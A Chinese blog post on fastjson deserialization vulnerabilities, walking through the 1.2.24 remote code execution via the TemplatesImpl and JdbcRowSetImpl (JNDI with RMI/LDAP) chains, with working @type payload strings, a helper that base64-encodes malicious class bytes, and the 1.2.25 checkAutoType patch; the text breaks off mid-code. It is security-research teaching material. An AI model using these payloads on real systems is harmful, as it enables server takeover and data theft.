<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="fastjson反序列化, Ethe&#39;s blog">
    <meta name="description" content="环境配置&amp;lt;dependency&gt;
	&amp;lt;groupId&gt;com.alibaba&amp;lt;/groupId&gt;
	&amp;lt;artifactId&gt;fastjson&amp;lt;/artifactId&gt;
	&amp;lt;version&gt;1.2.23&amp;l">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>fastjson反序列化 | Ethe&#39;s blog</title>
    <link rel="icon" type="image/png" href="https://epicture.oss-cn-beijing.aliyuncs.com/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/my.css">

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/jquery/jquery-3.6.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>



   <style>
    body{
       background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
       background-repeat:no-repeat;
       background-size: cover;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ethe&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ethe&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/17.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">fastjson反序列化</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: scroll;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }
    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                <span class="chip bg-color">web学习</span>
                            </a>
                        
                            <a href="/tags/Java/">
                                <span class="chip bg-color">Java</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-05-07
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2024-06-03
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    6.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    27 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h1><pre class="language-xml" data-language="xml"><code class="language-xml"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>dependency</span><span class="token punctuation">></span></span>
	<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>groupId</span><span class="token punctuation">></span></span>com.alibaba<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>groupId</span><span class="token punctuation">></span></span>
	<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>artifactId</span><span class="token punctuation">></span></span>fastjson<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>artifactId</span><span class="token punctuation">></span></span>
	<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>version</span><span class="token punctuation">></span></span>1.2.23<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>version</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>dependency</span><span class="token punctuation">></span></span></code></pre>

<h1 id="Fastjson概述"><a href="#Fastjson概述" class="headerlink" title="Fastjson概述"></a>Fastjson概述</h1><p>FastJson是一个由阿里巴巴研发的java库，可以把java对象转换为JSON格式，也可以把JSON字符串转换为对象</p>
<p>这里列举一些 fastjson 功能要点：</p>
<ul>
<li>使用 <code>JSON.parse(jsonString)</code> 和 <code>JSON.parseObject(jsonString, Target.class)</code>，两者调用链一致，前者会在 jsonString 中解析字符串获取 <code>@type</code> 指定的类，后者则会直接使用参数中的class。</li>
<li>fastjson 在创建一个类实例时会通过反射调用类中符合条件的 getter/setter 方法，其中 getter 方法需满足条件：方法名长于 4、不是静态方法、以 <code>get</code> 开头且第4位是大写字母、方法不能有参数传入、继承自 <code>Collection|Map|AtomicBoolean|AtomicInteger|AtomicLong</code>、此属性没有 setter 方法；setter 方法需满足条件：方法名长于 4，以 <code>set</code> 开头且第4位是大写字母、非静态方法、返回类型为 void 或当前类、参数个数为 1 个。具体逻辑在 <code>com.alibaba.fastjson.util.JavaBeanInfo.build()</code> 中。</li>
<li>使用 <code>JSON.parseObject(jsonString)</code> 将会返回 JSONObject 对象，且类中的所有 getter 与setter 都被调用。</li>
<li>如果目标类中私有变量没有 setter 方法，但是在反序列化时仍想给这个变量赋值，则需要使用 <code>Feature.SupportNonPublicField</code> 参数。</li>
<li>fastjson 在为类属性寻找 get/set 方法时，调用函数 <code>com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#smartMatch()</code> 方法，会忽略 <code>_|-</code> 字符串，也就是说哪怕你的字段名叫 <code>_a_g_e_</code>，getter 方法为 <code>getAge()</code>，fastjson 也可以找得到，在 1.2.36 版本及后续版本还可以支持同时使用 <code>_</code> 和 <code>-</code> 进行组合混淆。</li>
<li>fastjson 在反序列化时，如果 Field 类型为 <code>byte[]</code>，将会调用<code>com.alibaba.fastjson.parser.JSONScanner#bytesValue</code> 进行 base64 解码，对应的，在序列化时也会进行 base64 编码。</li>
</ul>
<h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><p>先建一个javabean</p>
<pre class="language-java" data-language="java"><code class="language-java">public class javaBean &#123;
    private String name;
    private int id;

    public javaBean()&#123;
        System.out.println(&quot;无参构造&quot;);
    &#125;

    public javaBean(String name, int id) &#123;
        this.name &#x3D; name;
        this.id &#x3D; id;
    &#125;

    @Override
    public String toString() &#123;
        return &quot;User&#123;&quot; +
                &quot;name&#x3D;&#39;&quot; + name + &#39;\&#39;&#39; +
                &quot;, id&#x3D;&quot; + id +
                &#39;&#125;&#39;;
    &#125;

    public String getName() &#123;
        return name;
    &#125;

    public void setName(String name) &#123;
        this.name &#x3D; name;
    &#125;

    public int getId() &#123;
        return id;
    &#125;

    public void setId(int id) &#123;
        System.out.println(&quot;setId&quot;);
        this.id &#x3D; id;
    &#125;
&#125;</code></pre>

<p>然后可以使用JSON的<code>toJSONString</code>方法 将对象转换为字符串</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507175656907.png" alt="image-20230507175656907"></p>
<p>但是这样得到的json格式的字符串只有属性的内容，不能区分出属于哪一个类，因此<code>toJSONString</code>方法还有第二个参数<code>SerializerFeature.WriteClassName</code></p>
<blockquote>
<p>传入<code>SerializerFeature.WriteClassName</code>可以使得Fastjson支持自省，开启自省后序列化成JSON的数据就会多一个@type，这个是代表对象类型的JSON文本。</p>
</blockquote>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507175837755.png" alt="image-20230507175837755"></p>
<p>这时的json中就有@type这个键，其值就是转换为json字符串的Java类</p>
<p>当然也可以把JSON 字符串转换为 Java 对象</p>
<p>使用<code>JSON.parse</code>或者<code>JSON.parseObject</code>可以把JSON 字符串转换为 Java 对象</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507181201385.png" alt="image-20230507181201385"></p>
<p><code>JSON.parseObject</code>方法中没指定对象，返回的则是<code>JSONObject</code>的对象。<code>JSON.parseObject</code>和 <code>JSON.parse</code>这两个方法差不多，<code>JSON.parseObject</code>的底层调用的还是<code>JSON.parse</code>方法，只是在<code>JSON.parse</code>的基础上做了一个封装。</p>
<p>这种把对象转化为json字符串，再把字符串转换为java对象的过程其实也是一种序列化和反序列化</p>
<p><strong>在序列化时，<code>FastJson</code>会调用成员对应的<code>get</code>方法，被<code>private</code>修饰且没有<code>get</code>方法的成员不会被序列化，</strong></p>
<p>而反序列化的时候在，会调用了指定类的全部的<code>setter</code>，<code>publibc</code>修饰的成员全部赋值。</p>
<h1 id="Fastjson1-2-24-版本漏洞复现"><a href="#Fastjson1-2-24-版本漏洞复现" class="headerlink" title="Fastjson1.2.24 版本漏洞复现"></a>Fastjson1.2.24 版本漏洞复现</h1><p>漏洞是利用fastjson autotype在处理json对象的时候，未对@type字段进行完全的安全性验证，攻击者可以传入危险类，并调用危险类连接远程rmi主机，通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用，获取服务器的敏感信息泄露，甚至可以利用此漏洞进一步对服务器数据进行修改，增加，删除等操作，对服务器造成巨大的影响。</p>
<h2 id="漏洞攻击方式"><a href="#漏洞攻击方式" class="headerlink" title="漏洞攻击方式"></a>漏洞攻击方式</h2><p>@type 指定类<br>使用<code>JSON.parse</code>方法反序列化会调用此类的set方法<br>使用<code>JSON.parseObject</code>方法反序列化会调用此类get和set方法<br>可以写一个恶意类，然后通过这一特性实现命令执行</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507212130217.png" alt="image-20230507212130217"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507212119172.png" alt="image-20230507212119172"></p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><h3 id="parseObject流程"><a href="#parseObject流程" class="headerlink" title="parseObject流程"></a>parseObject流程</h3><p>在正式复现漏洞之前，先看看parseObject的执行流程</p>
<p>首先就能看出来parseObject其实就是调了一个parse然后进行了强制类型转换</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230508161820331.png" alt="image-20230508161820331"></p>
<h3 id="TemplatesImpl链"><a href="#TemplatesImpl链" class="headerlink" title="TemplatesImpl链"></a>TemplatesImpl链</h3><p>版本：fastjson &lt;= 1.2.24</p>
<p>说明：借助TemplatesImpl类实现漏洞利用</p>
<p>这个类在CC链和CB链里都出现过，这里就是用了CB的那条从getOutputProperties到defineClass的路</p>
<p>先试试能不能到getOutputProperties，因为只有JSON.parseObject才能调用属性的get方法，所有这里只能用JSON.parseObject，而且因为fastjson处理的时候会去掉下划线，所以这个getOutputProperties方法对应的就是_outputProperties属性</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507213337271.png" alt="image-20230507213337271"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507213503408.png" alt="image-20230507213503408"></p>
<p>证明确实能过来，所以后边就简单多了，就是满足一些条件，让它能最终加载恶意字节码</p>
<p>找找加载字节码的路上有哪些if判断，首先是_name不能为空，_class为空</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507213559252.png" alt="image-20230507213559252"></p>
<p>然后是_bytecodes不能为空</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507213645315.png" alt="image-20230507213645315"></p>
<p>_tfactory也不能空</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507220349149.png" alt="image-20230507220349149"></p>
<p>最后就是加载的字节码内容是_bytecodes里的</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507213909331.png" alt="image-20230507213909331"></p>
<p>这里<code>_outputProperties</code>和<code>_tfactory</code>是<code>HashMap</code>类型的成员变量，所以可以赋值成一个空的hashmap，然后<code>_name</code>随便赋个字符串类型的值，<code>_bytecodes</code>是数组类型的值，这里我们先不纠结<code>_bytecodes</code>里的内容，先把链子跑通再说</p>
<p>Fastjson默认只会反序列化public修饰的属性，因此由于outputProperties和_bytecodes由private修饰，必须加入<code>Feature.SupportNonPublicField</code>在parseObject中才能触发；</p>
<p>构造好的测试payload为</p>
<pre class="language-java" data-language="java"><code class="language-java">String text &#x3D; &quot;&#123;\&quot;@type\&quot;:\&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\&quot;,\&quot;_name\&quot;:\&quot;a\&quot;,\&quot;_tfactory\&quot;:&#123;&#125;,\&quot;_bytecodes\&quot;:[\&quot;1111111\&quot;],\&quot;_outputProperties\&quot;:&#123;&#125;&#125;&quot;;
</code></pre>

<p>这里一定要注意顺序，因为我们要的是给所有的属性赋值完后再去执行反序列化链，因此_outputProperties必须放在最后面</p>
<p>调试一下发现已经走到defineClass里了，但是字节数组里没有值</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507221113254.png" alt="image-20230507221113254"></p>
<p>这就是我们之前说的fastjson 在反序列化时，如果 Field 类型为 <code>byte[]</code>，将会调用<code>com.alibaba.fastjson.parser.JSONScanner#bytesValue</code> 进行 base64 解码，对应的，在序列化时也会进行 base64 编码。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507222156589.png" alt="image-20230507222156589"></p>
<p>因为单纯的一个字符解不出来东西，导致出来的字节数组是空的</p>
<p>这也意味着我们要加载的恶意字节码必须经过base64加密后再传进去</p>
<p>这里就直接用cc3的时候的恶意字节码文件，然后对其进行base64加密</p>
<pre class="language-java" data-language="java"><code class="language-java">import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;
import java.util.Base64;
import java.util.Base64.Encoder;

public class base &#123;
    public static void main(String args[]) &#123;
        byte[] buffer &#x3D; null;
        String filepath &#x3D; &quot;src&#x2F;main&#x2F;java&#x2F;loadclass&#x2F;cmd.class&quot;;
        try &#123;
            FileInputStream fis &#x3D; new FileInputStream(filepath);
            ByteArrayOutputStream bos &#x3D; new ByteArrayOutputStream();
            byte[] b &#x3D; new byte[1024];
            int n;
            while((n &#x3D; fis.read(b))!&#x3D;-1) &#123;
                bos.write(b,0,n);
            &#125;
            fis.close();
            bos.close();
            buffer &#x3D; bos.toByteArray();
        &#125;catch(Exception e) &#123;
            e.printStackTrace();
        &#125;
        Encoder encoder &#x3D; Base64.getEncoder();
        String value &#x3D; encoder.encodeToString(buffer);
        System.out.println(value);
    &#125;
&#125;</code></pre>

<p>把得到的base64的结果放进_bytecodes里</p>
<p>执行即可</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230507222920375.png" alt="image-20230507222920375"></p>
<p><strong>总结</strong></p>
<p>其实主要都是CB链的部分，大部分内容在前边也都讲过了</p>
<h3 id="JdbcRowSetImpl-链"><a href="#JdbcRowSetImpl-链" class="headerlink" title="JdbcRowSetImpl 链"></a>JdbcRowSetImpl 链</h3><p>这个就是基于JNDI注入的攻击方式，也是最常用的一种</p>
<p>和JNDI一样，有两种，一种是和RMI一起，另一种是和LDAP一起</p>
<h4 id="1-JNDI-RMI"><a href="#1-JNDI-RMI" class="headerlink" title="1. JNDI + RMI"></a>1. JNDI + RMI</h4><p>在JdbcRowSetImpl这个类里，有这么一个set方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524130414372.png" alt="image-20230524130414372"></p>
<p>设置数据库源</p>
<p>里面调用了父类的setDataSourceName方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524133345710.png" alt="image-20230524133345710"></p>
<p>这里面若name为空，则会对dataSource赋值，这个值我们可控。</p>
<p>然后再看JdbcRowSetImpl类里的setAutoCommit</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524134157752.png" alt="image-20230524134157752"></p>
<p>当conn为空时，会进入connect方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524134253621.png" alt="image-20230524134253621"></p>
<p>一个lookup方法，一个可控的url，完美的jndi注入点</p>
<p>而且这个conn在构造方法里，默认就是null</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524134424750.png" alt="image-20230524134424750"></p>
<p>然后就可以构造一下payload了</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">&#123;&quot;@type&quot;:&quot;com.sun.rowset.JdbcRowSetImpl&quot;,&quot;DataSourceName&quot;:&quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;remoteobj&quot;,&quot;autoCommit&quot;:true&#125;</code></pre>

<p>再起一个基于rmi的JNDI服务端端</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524135938691.png" alt="image-20230524135938691"></p>
<h4 id="2-JNDI-LDAP"><a href="#2-JNDI-LDAP" class="headerlink" title="2. JNDI + LDAP"></a>2. JNDI + LDAP</h4><p>就改个url，其他的和RMI的一样</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524141121218.png" alt="image-20230524141121218"></p>
<p>贴个调用链，方便后边对比</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524142807132.png" alt="image-20230524142807132"></p>
<h1 id="Fastjson坎坷曲折的一生"><a href="#Fastjson坎坷曲折的一生" class="headerlink" title="Fastjson坎坷曲折的一生"></a>Fastjson坎坷曲折的一生</h1><p>自1.2.24版本出现了Fastjson的反序列化漏洞后，在之后几个版本，阿里不断的在对漏洞点进行修补，而安全研究者们也在不断的寻找绕过的手段（这真是，泰裤辣！</p>
<h2 id="1-2-25-1-2-41"><a href="#1-2-25-1-2-41" class="headerlink" title="1.2.25-1.2.41"></a>1.2.25-1.2.41</h2><h3 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h3><p>在这个版本中，fastjson增加了黑名单而且设置了一个<code>autoTypeSupport</code>用来控制是否可以反序列化，<code>autoTypeSupport</code>默认为<code>false</code>且禁止反序列化，为true时会使用<code>checkAutoType</code>来进行安全检测</p>
<p>是在DefaultJSONParser.parseObject()里用的</p>
<p>1.2.24版本：</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524143022145.png" alt="image-20230524143022145"></p>
<p>1.2.25版本：</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524143208177.png" alt="image-20230524143208177"></p>
<p>跟进这个checkAutoType看看</p>
<pre class="language-java" data-language="java"><code class="language-java">public Class&lt;?&gt; checkAutoType(String typeName, Class&lt;?&gt; expectClass) &#123;
    if (typeName &#x3D;&#x3D; null) &#123;
        return null;
    &#125;
 
    final String className &#x3D; typeName.replace(&#39;$&#39;, &#39;.&#39;);
 
    &#x2F;&#x2F; autoTypeSupport默认为False
    &#x2F;&#x2F; 当autoTypeSupport开启时，先白名单过滤，匹配成功即可加载该类，否则再黑名单过滤
    if (autoTypeSupport || expectClass !&#x3D; null) &#123;
        for (int i &#x3D; 0; i &lt; acceptList.length; ++i) &#123;
            String accept &#x3D; acceptList[i];
            if (className.startsWith(accept)) &#123;
                return TypeUtils.loadClass(typeName, defaultClassLoader);
            &#125;
        &#125;
 
        for (int i &#x3D; 0; i &lt; denyList.length; ++i) &#123;
            String deny &#x3D; denyList[i];
            if (className.startsWith(deny)) &#123;
                throw new JSONException(&quot;autoType is not support. &quot; + typeName);
            &#125;
        &#125;
    &#125;
 
    &#x2F;&#x2F; 从Map缓存中获取类，注意这是后面版本的漏洞点
    Class&lt;?&gt; clazz &#x3D; TypeUtils.getClassFromMapping(typeName);
    if (clazz &#x3D;&#x3D; null) &#123;
        clazz &#x3D; deserializers.findClass(typeName);
    &#125;
 
    if (clazz !&#x3D; null) &#123;
        if (expectClass !&#x3D; null &amp;&amp; !expectClass.isAssignableFrom(clazz)) &#123;
            throw new JSONException(&quot;type not match. &quot; + typeName + &quot; -&gt; &quot; + expectClass.getName());
        &#125;
 
        return clazz;
    &#125;
 
    &#x2F;&#x2F; 当autoTypeSupport未开启时，先黑名单过滤，再白名单过滤，若白名单匹配上则直接加载该类，否则报错
